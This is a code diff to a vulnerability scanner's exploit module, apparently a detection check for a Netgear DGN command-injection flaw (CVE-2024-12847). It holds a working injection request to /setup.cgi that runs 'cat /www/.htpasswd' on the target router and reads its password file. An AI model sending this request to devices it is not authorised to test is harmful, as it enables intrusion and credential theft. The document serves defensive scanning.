Add detection for CVE-2024-12847

agent/exploits/cve_2024_12847.py

@@ -19,6 +19,10 @@
 RISK_RATING = "CRITICAL"
 DEFAULT_TIMEOUT = datetime.timedelta(seconds=90)
 
+COMMAND = "cat+/www/.htpasswd"
+ENDPOINT = "/setup.cgi"
+KEYWORD = "admin"
+
 
 @exploits_registry.register
 class NetgearDGNCommandInjectionExploit(webexploit.WebExploit):
@@ -36,7 +40,7 @@ class NetgearDGNCommandInjectionExploit(webexploit.WebExploit):
     def accept(self, target: definitions.Target) -> bool:
         try:
             resp = self.session.get(
-                target.origin + "/setup.cgi/", timeout=DEFAULT_TIMEOUT.seconds
+                target.origin + ENDPOINT, timeout=DEFAULT_TIMEOUT.seconds
             )
         except requests_exceptions.RequestException:
             return False
@@ -49,20 +53,19 @@ def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
         vulnerabilities: list[definitions.Vulnerability] = []
 
         try:
-            cmd = "cat /www/.htpasswd"
             resp = self.session.get(
-                f"{target.origin}/setup.cgi",
+                f"{target.origin}{ENDPOINT}",
                 params={
                     "next_file": "netgear.cfg",
                     "todo": "syscmd",
-                    "cmd": cmd,
+                    "cmd": COMMAND,
                     "curpath": "/",
                     "currentsetting.htm": "1",
                 },
                 timeout=DEFAULT_TIMEOUT.seconds,
             )
 
-            if resp.status_code == 200 and "admin" in resp.text:
+            if resp.status_code == 200 and KEYWORD in resp.text:
                 vulnerabilities.append(self._create_vulnerability(target))
 
         except requests_exceptions.RequestException as e: